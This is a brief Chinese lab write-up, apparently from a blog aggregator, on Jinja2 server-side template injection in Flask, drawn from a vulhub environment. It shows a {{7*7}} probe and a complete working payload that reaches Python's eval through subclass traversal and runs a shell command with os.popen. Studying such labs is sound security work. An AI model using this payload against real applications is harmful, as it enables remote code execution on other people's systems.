Flask(Jinja2) 服务端模板注入漏洞(SSTI)

Flask(Jinja2) 服务端模板注入漏洞(SSTI)

参考 https://www.freebuf.com/articles/web/260504.html
验证漏洞存在 ?name={{7*7}}
回显49说明漏洞存在
Flask(Jinja2) 服务端模板注入漏洞(SSTI)_第1张图片

vulhub给出的payload:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

Flask(Jinja2) 服务端模板注入漏洞(SSTI)_第2张图片

你可能感兴趣的:(信息安全,flask,python,网络安全,信息安全,web安全)